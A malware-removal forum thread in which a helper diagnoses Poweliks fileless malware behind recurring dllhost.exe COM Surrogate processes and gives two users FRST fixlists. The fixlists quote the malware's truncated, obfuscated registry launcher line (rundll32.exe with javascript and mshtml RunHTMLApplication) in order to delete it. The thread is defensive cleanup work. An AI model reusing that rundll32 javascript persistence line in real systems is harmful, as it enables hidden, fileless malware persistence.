Dllhost.exe COM Surrogates keep trying to connect

Yesterday I started getting warnings from Avast blocking webpages (I was not online, I was in a game with no browser open). Avast seemed to block everything but when I check my task manager I saw several dllhost.exe*32 COM Surrogates. I was able to end their tasks but 5-10 minutes later they started up again. (I was not using the computer this weekend and when I came back Sunday the first thing I did was launch a game and teamspeak 3, so I am not sure what caused this. Avast and MBAM have not seemed to have a problem blocking anything today.

The process being blocked is SysWOW64\dllhost.exe. I saw others post this same thing happening to them yesterday so something must have happened the same time.

Quick update, the COM Surrogates come every 5 minutes like clockwork, MBAM still blocking all of it but I need to close the surrogates myself in task manager. Anyone able to help?

Let me know if this stops it

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-1977768418-3833106981-970839474-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File CustomCLSID: HKU\S-1-5-21-1977768418-3833106981-970839474-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that

Before the com surrogates were coming every 5 minutes on the dot, its been 30 minutes and everything is quiet now. I have high hopes this worked!

As soon as you are happy let me know and I will tidy up

It’s been just over an hour now, and no issues. I feel good about it. Any idea how it got in?

I have not yet seen a dropper for this so I do not know how it gets on the system. But, what it does is create a registry key with a java script so no files are actually on the system
There is a small write up on it here http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/

Subject to no further problems :slight_smile:

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself so…The following will implement some cleanup procedures as well as reset System Restore points:

Download and run Delfix

https://dl.dropboxusercontent.com/u/73555776/delfix.JPG

: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware

https://dl.dropboxusercontent.com/u/73555776/CryptoPrevent.JPG

Malwarebytes.

Update and run weekly to keep your system clean

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe :wave:

Cleaned up, Thank you So much for the help! ;D I’ll check back in tomorrow.

:slight_smile:

Just wanted to let you know I’ve been problem free, thank you again so much for the help!!

My pleasure :slight_smile:

Hello.

I wasn’t sure if I should start a new post or what, so I figured I’d reply in this thread.
I started having the same issues within the last day or so on my system. I noticed I was slowing down some and having random weird issues (screen flashing, what seemed to be small window popups while in games).

This morning after booting up my system, it seemed to be slow in opening web pages. I checked my processes and noticed multiple dllhost.exe*32 COMSurrogate processes on my system, using large amounts of memory.
I have never noticed any processes like this before.

I ran AVAST a couple of days ago and it seemed to catch several Trojans and quarantine them, so I thought I was free of any more problems. Then this started yesterday.

I downloaded FRST and ran it to generate logs. I will attach them here.

I would appreciate any help that you may be able to give.

Thanks!

I’d say, start your own thread, but since the OP seems to be finished, I will point Essex’s in this direction.

Edit: Modified the name, as not to include their first name, but display name.

I can start a new thread if that is the preferred protocol here.

We will continue here. This should fix it

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1487341080-1029705537-1019002416-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File 2014-10-29 21:40 - 2014-10-29 21:40 - 00003124 _____ () C:\Windows\System32\Tasks\{36970FDD-B2C3-41ED-B4A7-AE9EC7AC0741} CustomCLSID: HKU\S-1-5-21-1487341080-1029705537-1019002416-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that

Thank you so much essexboy! That seems to have done the trick. I will include the report generated by FRST here for you.
Thanks again!

When you are happy let me know and I will tidy up

Ok, it’s been a full 24 hours on my end with no re-occurrence. I think things are fine on my end now.

Feel free to do any tidying up you need to on my end.

Thanks!

In that case methinks I will send you on your merry way :slight_smile:

Subject to no further problems :slight_smile:

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself so…The following will implement some cleanup procedures as well as reset System Restore points:

Download and run Delfix

https://dl.dropboxusercontent.com/u/73555776/delfix.JPG

: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware

https://dl.dropboxusercontent.com/u/73555776/CryptoPrevent.JPG

Malwarebytes.

Update and run weekly to keep your system clean

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe :wave: